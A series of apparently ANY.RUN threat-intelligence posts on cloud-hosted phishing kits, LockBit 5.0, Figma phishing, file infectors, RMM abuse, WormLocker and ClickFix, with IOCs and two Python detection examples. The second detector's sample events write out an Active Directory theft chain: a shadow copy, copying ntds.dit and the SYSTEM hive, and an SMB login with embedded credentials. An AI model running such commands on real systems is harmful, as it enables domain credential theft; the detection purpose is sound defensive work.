#ExploreWithANYRUN

🚨 #Phishing on Trusted Cloud Infrastructure: Google, Microsoft, Cloudflare.
We’re tracking a growing trend where phishing kit infrastructure is hosted on legitimate cloud and CDN platforms, not newly registered domains. In some cases, these campaigns specifically target enterprise users. This creates serious visibility challenges for security teams.

We’ve observed this pattern across multiple #phishkits:
🔹 #Tycoon hosted on alencure[.]blob[.]core[.]windows[.]net (Microsoft Azure Blob Storage): app.any.run/tasks/29b53d89-99b
⚠️ #Sneaky2FA hosted on legitimate cloud platforms, filtering out free email domains via a fake Microsoft 365 login to target corporate accounts:
firebasestorage[.]googleapis[.]com (Cloud Storage for Firebase): app.any.run/tasks/8189dd5e-015
cloudfront[.]net (AWS CloudFront): app.any.run/tasks/9a2d1537-e95
🔹 #EvilProxy hosted on sites[.]google[.]com (Google Sites): app.any.run/tasks/07995c22-6e7

Victims see a “trusted” provider domain, while the network only sees normal HTML being loaded from cloud infrastructure. What looks clean at first glance is exposed by #ANYRUN Sandbox in under 60 seconds, directly reducing MTTD and MTTR.

πŸ” Hunt for related activity and pivot from #IOCs using these search queries in TI Lookup:
πŸ”Ή Microsoft Azure Blob Storage abuse: intelligence.any.run/analysis/
πŸ”Ή Firebase Cloud Storage abuse: intelligence.any.run/analysis/
πŸ”Ή Google Sites abuse: intelligence.any.run/analysis/

Many security vendors will flag these domains as legitimate. Technically, they are. That’s why security teams need behavioral analysis and network-level signals to reliably uncover phishing before impact.
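A network-level check of the kind the post argues for, added here as an example (not ANY.RUN's code): it parses constructed proxy log lines and flags a client that loaded HTML from object storage or a CDN outside the organisation's own accounts and then POSTed to a different host. The log format and the KNOWN_ORG_HOSTS allowlist are assumptions.

```python
import re
from collections import defaultdict

# Cloud storage / CDN hosts the post lists as abused for phishing-kit hosting.
ABUSED_CLOUD_SUFFIXES = ("blob.core.windows.net", "firebasestorage.googleapis.com",
                         "cloudfront.net", "sites.google.com")
# Assumed: storage accounts the organisation itself owns (tune per environment).
KNOWN_ORG_HOSTS = {"corpfiles.blob.core.windows.net"}

# Assumed proxy log format: <ts> <client> <method> <url> <status> <content-type>
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>GET|POST) "
                    r"https?://(?P<host>[^/ ]+)\S* (?P<status>\d{3}) (?P<ctype>\S+)$")

# Constructed sample log: one victim, one benign internal download, one lone Sites view.
SAMPLE_PROXY_LOG = """\
2025-09-30T10:00:01Z 10.0.0.5 GET https://alencure.blob.core.windows.net/kit/index.html 200 text/html
2025-09-30T10:00:03Z 10.0.0.5 GET https://alencure.blob.core.windows.net/kit/app.js 200 application/javascript
2025-09-30T10:00:20Z 10.0.0.5 POST https://mphdvh.icu/api/login 200 application/json
2025-09-30T10:01:00Z 10.0.0.7 GET https://corpfiles.blob.core.windows.net/reports/q3.html 200 text/html
2025-09-30T10:02:00Z 10.0.0.9 GET https://sites.google.com/view/invoice 200 text/html
""".splitlines()

def is_abused_cloud_host(host: str) -> bool:
    """True for a storage/CDN host that is not one of our own known accounts."""
    host = host.lower()
    if host in KNOWN_ORG_HOSTS:
        return False
    return any(host == s or host.endswith("." + s) for s in ABUSED_CLOUD_SUFFIXES)

def find_suspicious_sessions(lines):
    """Per client: HTML fetched from an abused cloud host, then a POST to a different host.
    Returns [(client, html_host, post_host), ...]. A lone HTML load is not flagged,
    because plenty of legitimate content lives on the same platforms."""
    per_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            per_client[m["client"]].append(m.groupdict())
    hits = []
    for client, evs in per_client.items():
        html_hosts = [e["host"] for e in evs if e["method"] == "GET"
                      and e["ctype"].startswith("text/html") and is_abused_cloud_host(e["host"])]
        posts = [e["host"] for e in evs if e["method"] == "POST" and e["host"] not in html_hosts]
        if html_hosts and posts:
            hits.append((client, html_hosts[0], posts[0]))
    return hits
```

The second sample client is silent because its storage account is allowlisted, and the third because it never submitted anything: the pairing, not the domain, is the signal.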

🚀 Speed up detection and gain full visibility into complex threats with #ANYRUN. Sign up: app.any.run/?utm_source=mastod
#ExploreWithANYRUN

#IOCs:
mphdvh[.]icu
kamitore[.]com
aircosspascual[.]com
Lustefea[.]my[.]id

#cybersecurity #infosec

🚨 New #LockBit Variant Targets ESXi and Linux: Critical Infrastructure at Risk.
⚠️ In September 2025, on its sixth anniversary, the LockBit group released LockBit 5.0, a new version of its #ransomware. The new variant introduces stronger obfuscation, flexible configurations, and advanced anti-analysis techniques.

The most alarming development is the expansion to #Linux and #VMware ESXi, signaling a clear focus on server environments and critical infrastructure. Ransomware has shifted from targeting endpoints to directly disrupting core infrastructure.

❗️ A single intrusion can take down dozens of virtual servers, causing organization-wide outages with severe financial and reputational impact.

LockBit 5.0 comes in three builds, each optimized for its target OS with nearly identical functionality.

🚨 VMware ESXi: The most critical new variant, a dedicated encryptor for hypervisors that can simultaneously disable all VMs on a host. Its CLI resembles the other builds but adds VM datastore and config targeting.
See live execution: app.any.run/tasks/c3591887-eb3

📌 Windows: Main variant. Runs with DLL reflection, supports both GUI and console, encrypts local and network files, removes VSS shadow copies, stops services, clears event logs, and drops ransom notes linking to live chat support.
See live execution: app.any.run/tasks/17cc701e-746

📌 Linux: Console-based, replicates Windows functionality with mount point filters, post-encryption disk wiping, and anti-analysis checks such as geolocation restrictions and build expiry.
See live execution: app.any.run/tasks/d22b7747-1ef

πŸ” Use these TI Lookup search queries to monitor for suspicious activity and enrich detection logic with live threat data:
ESXi Lockbit 5.0: intelligence.any.run/analysis/
Linux Lockbit 5.0: intelligence.any.run/analysis/
Windows Lockbit 5.0: intelligence.any.run/analysis/

πŸ‘¨β€πŸ’» What can you do now?
βœ… Boost visibility: combine EDR/XDR with behavior-based monitoring. Leverage #ANYRUN’s Sandbox and TI Lookup to detect new builds early, enrich detection rules, and reduce MTTR by up to 21 minutes.
βœ… Harden access: enforce MFA for vCenter, restrict direct internet access to ESXi hosts, and route connections through VPN.
βœ… Ensure resilience: keep offline backups and test recovery regularly.

πŸ‘ Thanks to
@fbgwls245
for sharing the Linux sample with the community!

🚀 Strengthen resilience, protect business continuity through proactive security with #ANYRUN. #ExploreWithANYRUN #CybersecurityAwarenessMonth

🚨 Figma Abuse Leads to Microsoft-Themed #Phishing.
⚠️ Attackers are exploiting trusted platforms to bypass defenses. Among all phishing threats we tracked last month, #phishkits abusing Figma made up a significant share: #Storm1747 (49%), Mamba (25%), Gabagool (2%), and Other (24%).

πŸ” This trend underscores the need to monitor abuse of trusted platforms that create blind spots in defenses and raise the risk of large-scale credential theft.

In this case, Figma prototypes were abused as phishing lures: a victim receives an email with a link to a “document” hosted on figma.com. Once opened, the prototype displays content that prompts a click on an embedded link. The chain continues through fake CAPTCHAs or even a legitimate Cloudflare Turnstile widget.

🔗 Execution chain:
Phishing email with a link ➑️ Figma document ➑️ Fake CAPTCHA or Cloudflare Turnstile widget ➑️ Phishing Microsoft login page

πŸ‘¨β€πŸ’» See the full execution on a live system and download actionable report: app.any.run/tasks/5652b435-233

📌 Why Figma? Public prototypes are easy to create and share, require no authentication, and come from a trusted domain. This combination makes it easier to bypass automated security controls, slip through email filters, and increase user interaction.

🎯 For CISOs, the abuse of widely trusted platforms creates critical monitoring gaps, while Microsoft impersonation elevates the risk of credential theft or account takeover, posing direct risks to business resilience and compliance.

SOC teams need the ability to trace redirect chains, uncover hidden payloads, and enrich detection rules with both static #IOCs and behavioral context.

πŸ” Use this TI Lookup search query to expand threat visibility and enrich #IOCs with actionable threat context:
intelligence.any.run/analysis/

IOCs:
9a4c7dcf25e9590654694063bc4958d58bcbe57e5e95d9469189db6873c4bb2c
Dataartnepal[.]com

Strengthen resilience and protect business continuity with #ANYRUN 🚀 #ExploreWithANYRUN

#cybersecurity #infosec

🚨 Fileinfectors Evolved: Spreading Ransomware Across Enterprise Networks

⚠️ Fileinfector #malware inserts its code into files. These threats once spread mainly through external drives and local systems. Today’s file infectors are mostly hybrid variants, frequently combined with #ransomware.

These variants encrypt data and inject malicious code into files, enabling further spread when infected files are executed.

❗️ They are especially dangerous in corporate environments with shared folders, where a single infected file can rapidly spread across the network and cause widespread damage.
Such outbreaks overwhelm security teams, complicate incident response, and disrupt business continuity.

πŸ‘¨β€πŸ’» An optimized SOC that relies on early detection, behavioral analysis, and proactive hunting is critical to limiting impact. Let’s see malware execution on a live system:
app.any.run/tasks/7ea8ab1f-3c9

In this case, the malware interacts with multiple files and modifies their content. The infected files become executables, with PE headers confirming the injected malicious code.

The analysis revealed hybrid behavior: a fileinfector acting like ransomware, enabling further spread on execution.

πŸ” Use this TI Lookup search query to explore fileinfector activity and enrich #IOCs with actionable threat context:
intelligence.any.run/analysis/

👾 Gather malware hashes and infected files to power proactive hunting:
intelligence.any.run/analysis/

Hybrid fileinfectors pose a significant threat to enterprise networks. Leveraging #ANYRUN Sandbox and TI Lookup reduces MTTR by up to 21 minutes per case and gives access to 24x more IOCs from millions of past analyses.

Strengthen resilience and protect critical assets through proactive security with #ANYRUN 🚀 #ExploreWithANYRUN

#cybersecurity #infosec

🚨 Fake 7-Zip installer exfiltrates Active Directory files.
A #malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server.
🥷 Upon execution, the #malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations.

🎯 It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys.

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces.

πŸ‘¨β€πŸ’» #ANYRUN Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session.
πŸ” See analysis session: app.any.run/tasks/7f03cd5b-ad0

This technique grants the attacker full access to the ntds.dit dump, allowing them to extract credentials for Active Directory objects and enabling lateral movement techniques such as Pass-the-Hash or Golden Ticket.
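A correlation rule for the chain described above, added as an example and not ANY.RUN's own detection logic: it classifies constructed process-creation events into stages (shadow copy, ntds.dit copy, SYSTEM hive save, SMB connection with inline credentials) and alerts only when several stages share a parent process. The regexes, the sample command lines and the three-stage threshold are assumptions.

```python
import re
from collections import defaultdict

# One regex per stage of the chain the post describes. The patterns are this example's own
# generic T1003.003-style indicators, not the installer's actual command lines.
STAGES = {
    "shadow_copy": re.compile(r"\b(vssadmin\s+create\s+shadow|shadowcopy\s+call\s+create)\b", re.I),
    "ntds_copy":   re.compile(r"HarddiskVolumeShadowCopy\d+.*\\ntds\.dit", re.I),
    "system_hive": re.compile(r"reg(\.exe)?\s+save\s+HKLM\\SYSTEM|HarddiskVolumeShadowCopy\d+.*\\config\\SYSTEM", re.I),
    "smb_creds":   re.compile(r"\bnet\s+use\s+\\\\\S+\s+\S+\s+/user:", re.I),
}
NUL_REDIRECT = re.compile(r">\s*NUL\b", re.I)  # output suppressed, as the post notes

# Constructed process-creation events (Sysmon Event ID 1 style): parent pid + command line.
SAMPLE_EVENTS = [
    {"ppid": 3990, "cmd": "vssadmin create shadow /for=C:"},
    {"ppid": 3990, "cmd": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Users\Public\out.dit > NUL"},
    {"ppid": 3990, "cmd": r"reg save HKLM\SYSTEM C:\Users\Public\sys.hiv > NUL"},
    {"ppid": 3990, "cmd": r"net use \\203.0.113.10\drop s3cret /user:drop > NUL"},
    {"ppid": 2200, "cmd": "vssadmin create shadow /for=C:"},  # backup job: one stage only
    {"ppid": 2200, "cmd": "vssadmin list shadows"},
]

def classify(cmd: str) -> set:
    """Return the set of chain stages a single command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}

def detect_ntds_theft(events, min_stages: int = 3) -> dict:
    """Correlate by parent process: alert only when >= min_stages distinct stages appear
    under the same parent. A lone shadow copy is normal backup behaviour and stays silent."""
    by_parent = defaultdict(lambda: {"stages": set(), "nul_redirects": 0})
    for ev in events:
        stages = classify(ev["cmd"])
        if not stages:
            continue
        rec = by_parent[ev["ppid"]]
        rec["stages"] |= stages
        if NUL_REDIRECT.search(ev["cmd"]):
            rec["nul_redirects"] += 1
    return {ppid: rec for ppid, rec in by_parent.items() if len(rec["stages"]) >= min_stages}
```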

🚀 Analyze and investigate the latest malware and #phishing threats with #ANYRUN.
#ExploreWithANYRUN

🚨 Top 5 Remote Access Tools Exploited by Threat Actors in the First Half of 2025.
⚠️ While legitimate and widely used by IT teams, Remote Monitoring and Management tools are increasingly used by threat actors to establish persistence, bypass defenses, and exfiltrate data.

In the first half of 2025, #ANYRUN observed a significant number of #malware samples leveraging known RMM software for #malicious access. Here are the 5 most frequently abused tools, along with analysis examples:
1️⃣ ScreenConnect – 3,829 sandbox sessions
app.any.run/tasks/3aa42d2e-8b9

2️⃣ UltraVNC – 2,117 sandbox sessions
app.any.run/tasks/1b7234a0-ab1

3️⃣ NetSupport – 746 sandbox sessions
app.any.run/tasks/6740b646-276

4️⃣ PDQ Connect – 230 sandbox sessions
app.any.run/tasks/05948d1c-312

5️⃣ Atera – 171 sandbox sessions
app.any.run/tasks/61e01084-e44

πŸ‘¨β€πŸ’» To support faster detection and investigation, we’ve added the rmm-tool tag in TI Lookup, making it easier for threat hunters and incident responders to track RMM-based intrusions.

πŸ” Explore recent RMM abuse cases in the last 180 days:
intelligence.any.run/analysis/

Analyze the latest malware and #phishing threats with #ANYRUN 🚀 #ExploreWithANYRUN

🚨 #WormLocker Returns with New Builds. First detected in 2021, this #ransomware remains active, with new samples recently identified.
πŸ‘¨β€πŸ’» With #ANYRUN Sandbox, analysts can trace the full execution chain and uncover #malware behavior without the need for reverse engineering or manual debugging. Let’s see it in action.

📥 Upon execution, WormLocker 2.0 creates worm_tool.sys files in both the Desktop and Downloads folders.

It uses the ‘takeown’ and ‘icacls’ commands to take ownership of system files and modify their access control lists. The malware then unpacks its resources into the System32 folder.

🚫 To disrupt system recovery, it disables Task Manager, deletes hidden files, and terminates the Explorer process. The Shell setting is set to empty, keeping Explorer disabled even after reboot.

WormLocker 2.0 employs #AES-256 in CBC mode with a fixed salt. The key is generated from the hardcoded static password ‘LUC QPV BTR’ by applying SHA-256.

🔑 Entering this password restores system settings and decrypts the affected data.

Finally, the ransomware runs a VBS script to play audio containing its ransom demand.

πŸ‘¨β€πŸ’» Analysis session: app.any.run/tasks/5a6eb571-5fb
With β€˜LUC QPV BTR’ password entered: app.any.run/tasks/5bb3af51-5d6

Improve your SOC operations with #ANYRUN 🚀
#ExploreWithANYRUN

🚨 New #ClickFix scam targets US users with fake MS Defender and CloudFlare pages.
⚠️ The scam page is hosted on a domain registered back in 2006, pretending to be the Indo-American Chamber of Commerce.
🎯 The #phishing page loads only for US-based victims, as observed during analysis with a residential IP in #ANYRUN Sandbox.

πŸ‘¨β€πŸ’» Analysis session: app.any.run/browses/50395c46-4

πŸ“ URL: iaccindia[.]com
The page hijacks the full-screen mode and displays a fake β€œWindows Defender Security Center” popup.

🎭 It mimics the Windows UI, locks the screen, and displays urgent messages to alarm the user.

Victims are prompted to call a fake tech support number (+1-…), setting the stage for further exploitation.

🎣 The phishing page may also display a fake CloudFlare message tricking users into executing a #malicious Run command.
Take a look: app.any.run/tasks/e83a5861-600

#IOCs:

Streamline threat analysis for your SOC with #ANYRUN 🚀
#ExploreWithANYRUN
